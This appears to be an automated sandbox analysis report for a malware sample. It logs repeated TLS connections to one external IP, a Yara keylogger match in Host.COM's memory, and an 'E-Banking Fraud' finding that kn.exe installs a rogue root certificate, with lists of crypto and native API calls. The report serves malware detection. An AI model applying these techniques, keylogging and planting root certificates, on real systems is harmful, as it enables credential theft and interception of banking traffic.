Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50087
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50088
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50096
Source: unknown	Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50095
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown	Network traffic detected: HTTP traffic on port 50193 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50133
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50132
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown	Network traffic detected: HTTP traffic on port 50078 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50215 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50023
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50144
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50145
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50151
Source: unknown	Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50153
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50159
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50182 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50160
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50162
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50161
Source: unknown	Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50203 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50043
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50164
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50042
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50163
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50166
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50165
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50168
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50049
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50169
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50050
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50171
Source: unknown	Network traffic detected: HTTP traffic on port 50160 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50170
Source: unknown	Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50173
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50172
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50126 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50214 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50145 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50042 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49935 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50180 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50219 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50088 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50133 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50043 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50192 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50207 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50181 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50218 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50206 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49936
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49935
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49902 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 50087 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 50169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50190 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49936 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49876 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49929
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49928
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50124 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50191 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49877 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50217 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50179 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49918
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49916
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49910
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49909
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49903
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49902
Source: unknown	Network traffic detected: HTTP traffic on port 49903 -> 443

Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49779 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49781 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49783 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49787 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49789 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49791 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49793 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49797 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49799 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49801 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49805 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49809 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49811 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49813 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49816 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49823 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49830 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49842 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49848 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49858 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49865 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49877 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49884 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49891 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49891 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49903 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49910 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49918 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49929 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49936 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49945 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49954 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49962 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49973 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49980 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49989 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49999 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50006 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50017 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50024 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50032 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50043 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50050 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50062 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50069 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50080 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50080 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50088 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50096 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50107 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50114 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50126 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50133 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50145 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50153 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50160 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50162 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50164 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50166 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50168 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50170 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50172 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50174 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50176 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50178 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50180 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50182 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50184 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50186 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50188 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50190 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50192 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50194 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50196 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50198 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50200 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50202 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50204 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50206 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50208 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50210 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50212 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50214 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50216 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50218 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50220 version: TLS 1.2

Yara detected Keylogger Generic

Source: Yara match

File source: Process Memory Space: Host.COM PID: 7652, type: MEMORYSTR

E-Banking Fraud

Registers a new ROOT certificate

Source: C:\Users\Public\kn.exe

6_2_00007FF7E07EB684

Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E082E1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,	6_2_00007FF7E082E1F8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07F25E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,	6_2_00007FF7E07F25E8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E086A740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,	6_2_00007FF7E086A740
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07F29A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,	6_2_00007FF7E07F29A0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E081EA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,	6_2_00007FF7E081EA7C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0866EA8 NCryptImportKey,#360,	6_2_00007FF7E0866EA8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0830EF4 NCryptImportKey,#205,#359,#359,#357,	6_2_00007FF7E0830EF4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0820F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,	6_2_00007FF7E0820F58
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08693A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,	6_2_00007FF7E08693A0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E083342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,	6_2_00007FF7E083342C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08698B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,	6_2_00007FF7E08698B0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E082184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,	6_2_00007FF7E082184C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07BF9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,	6_2_00007FF7E07BF9B8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07CFC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,	6_2_00007FF7E07CFC20

Contains functionality to call native functions

Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7937588C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,	3_2_00007FF7937588C0
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF79376BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,	3_2_00007FF79376BCF0
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF793758114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,	3_2_00007FF793758114
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF793757FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,	3_2_00007FF793757FF8
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7937589E4 NtQueryInformationToken,NtQueryInformationToken,	3_2_00007FF7937589E4
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF793771538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	3_2_00007FF793771538
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF79375898C NtQueryInformationToken,	3_2_00007FF79375898C
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF793743D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,	3_2_00007FF793743D94
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7937588C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,	5_2_00007FF7937588C0
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF79376BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,	5_2_00007FF79376BCF0
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF793758114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,	5_2_00007FF793758114
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF793757FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,	5_2_00007FF793757FF8
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7937589E4 NtQueryInformationToken,NtQueryInformationToken,	5_2_00007FF7937589E4
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF793771538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	5_2_00007FF793771538
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF79375898C NtQueryInformationToken,	5_2_00007FF79375898C
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF793743D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,	5_2_00007FF793743D94
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E088C964 NtQuerySystemTime,RtlTimeToSecondsSince1970,	6_2_00007FF7E088C964
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02E07D80 NtWriteVirtualMemory,	9_2_02E07D80
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02E0DD6C RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	9_2_02E0DD6C
